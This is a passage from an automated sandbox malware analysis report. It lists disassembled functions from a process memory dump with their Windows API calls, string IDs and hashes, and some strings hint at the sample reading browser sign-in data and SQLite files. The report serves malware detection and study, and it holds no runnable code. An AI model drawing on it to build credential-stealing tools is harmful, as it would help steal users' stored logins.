                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                                          • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                          • String ID: 6$\
                                                                                                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
